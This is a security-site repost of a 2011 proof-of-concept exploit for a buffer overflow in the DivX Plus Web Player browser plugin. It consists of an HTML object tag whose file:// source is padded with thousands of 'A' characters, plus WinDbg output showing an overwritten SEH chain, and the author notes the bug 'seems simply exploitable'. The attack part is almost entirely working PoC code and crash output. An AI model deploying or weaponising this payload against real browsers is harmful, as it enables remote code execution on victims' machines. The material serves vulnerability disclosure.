首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DivX Plus Web Player "file://" Buffer Overflow Vulnerability PoC
来源:Shahriyar.j < at > gmail 作者:Snake 发布时间:2011-10-08  

# Exploit Title: DivX Plus Web Player "file://" Buffer Overflow Vulnerability PoC ( 0day )
# Date: 10/4/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: DivX Plus Web Player <= 2.1.2.265
# Tested on: XP SP3 , IE6
# CVE : Not Assigned Yet
# Ref : http://dl.packetstormsecurity.net/1109-advisories/sa45550.txt
 
This is PoC I wrote for our free BA service in 0days.ir.
bug seems simply exploitable ;)


(ce8.ca8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000007b5 ebx=04634f9e ecx=0000062a edx=0000062b esi=00000041 edi=049ff3ac
eip=03d6c62d esp=049ff35c ebp=00000000 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210216
DivXPlaybackModule+0x3c62d:
03d6c62d 6689344f        mov     word ptr [edi+ecx*2],si  ds:0023:04a00000=5a4d
0:010> dd esp
049ff35c  045e56d4 00000000 03d6c8e3 049ffbfc
049ff36c  045e56d0 04634f9e 001f5980 00000000
049ff37c  001eb9e0 00000000 001c5258 00000008
049ff38c  00150178 ffffffff 7c91003d 001c5260
049ff39c  00150000 001ead30 7c8099fd 00000000
049ff3ac  0046002f 002f003a 00410041 00410041
049ff3bc  00410041 00410041 00410041 00410041
049ff3cc  00410041 00410041 00410041 00410041
0:010> dd
049ff3dc  00410041 00410041 00410041 00410041
049ff3ec  00410041 00410041 00410041 00410041
049ff3fc  00410041 00410041 00410041 00410041
049ff40c  00410041 00410041 00410041 00410041
049ff41c  00410041 00410041 00410041 00410041
049ff42c  00410041 00410041 00410041 00410041
049ff43c  00410041 00410041 00410041 00410041
049ff44c  00410041 00410041 00410041 00410041
0:010> !exchain
049ffd9c: iexplore!DllGetLCID+dca7 (00410041)
Invalid exception stack at 00410041

also
check here for free Persian BA :
http://www.0days.ir/article/ fun
twitter.com/ponez

-have

<object classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616" width="500" height="245" codebase="http://go.divx.com/plugin/DivXBrowserPlugin.cab">
  <param name="custommode" value="none" />
  <param name="previewImage" value="Test" />
  <param name="autoPlay" value="true" />
  <param name="src" value="file:///F:/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.mkv" />
<embed type="video/divx" src="file:///F:/.mkv" custommode="none" width="500" height="245" autoPlay="true" previewImage="Test" pluginspage="http://go.divx.com/plugin/download/">
</embed>
</object>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PolicyKit Pwnage: linux local
·Opera 10/11 (bad nesting with
·Ashampoo Burning Studio Elemen
·BlazeVideo HDTV Player 6.6 Pro
·FreeBSD UIPC socket heap overf
·52 byte Linux MIPS execve
·eSignal / eSignal Pro 10.6.242
·kernel-2.6.30 2010 Local Root
·ScriptFTP 3.3 Remote Buffer Ov
·Linux kernel 2.6.182 Local Roo
·Norman Security Suite 8 (npros
·Destiny Media Player Local SEH
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved